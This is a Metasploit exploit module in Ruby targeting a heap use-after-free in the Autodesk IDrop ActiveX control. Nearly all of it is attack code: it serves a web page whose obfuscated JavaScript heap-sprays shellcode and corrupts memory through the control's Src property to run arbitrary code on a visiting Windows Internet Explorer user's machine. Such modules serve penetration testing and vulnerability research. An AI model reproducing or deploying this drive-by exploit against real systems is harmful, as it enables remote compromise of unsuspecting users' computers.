## # $Id: autodesk_idrop.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Autodesk IDrop ActiveX Control Heap Memory Corruption', 'Description'=> %q{ This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Elazar Broad <elazarb[at]earthlink.net>', # Original exploit [see References] 'Trancer <mtrancer[at]gmail.com>'# Metasploit implementation ], 'Version'=> '$Revision: 9179 $', 'References' => [ [ 'OSVDB', '53265' ], [ 'BID', '34352' ], [ 'URL', 'http://www.milw0rm.com/exploits/8560' ], [ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload'=> { 'Space' => 1024, 'BadChars'=> "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets'=> [ [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Apr 2 2009', 'DefaultTarget'=> 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) blocksize = 0x40000 fillto= 550 offset = target['Offset'] # Randomize the javascript variable names idrop = rand_text_alpha(rand(100) + 1) j_function = rand_text_alpha(rand(100) + 1) j_shellcode= rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock= rand_text_alpha(rand(100) + 1) j_block= rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter= rand_text_alpha(rand(30) + 2) j_ret= rand_text_alpha(rand(100) + 1) j_mem= rand_text_alpha(rand(100) + 1) # Build out the message content = %Q| <html> <head> <script language='javascript' defer> function #{j_function}() { #{j_shellcode}=unescape('#{shellcode}'); #{j_nops}=unescape('#{nops}'); #{j_headersize}=20; #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length; while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops}; #{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace}); #{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace}); while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock}; #{j_memory}=new Array(); for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode}; var #{j_ret} = ''; for (#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++) { #{j_ret} += unescape('%u0a0a'); } for(#{j_counter}=0;#{j_counter}<20;#{j_counter}++) { try { var #{j_mem} = #{idrop}.Src; #{idrop}.Src = 'http://' + #{j_ret}; #{idrop}.Src = #{j_mem}; #{idrop}.Src = 'http://' + #{j_ret}; } catch(e){} } } </script> </head> <body onload='return #{j_function}();'> <object classid='clsid:21E0CB95-1198-4945-A3D2-4BF804295F78' id='#{idrop}'></object> </body> </html> | print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end
体验盒子
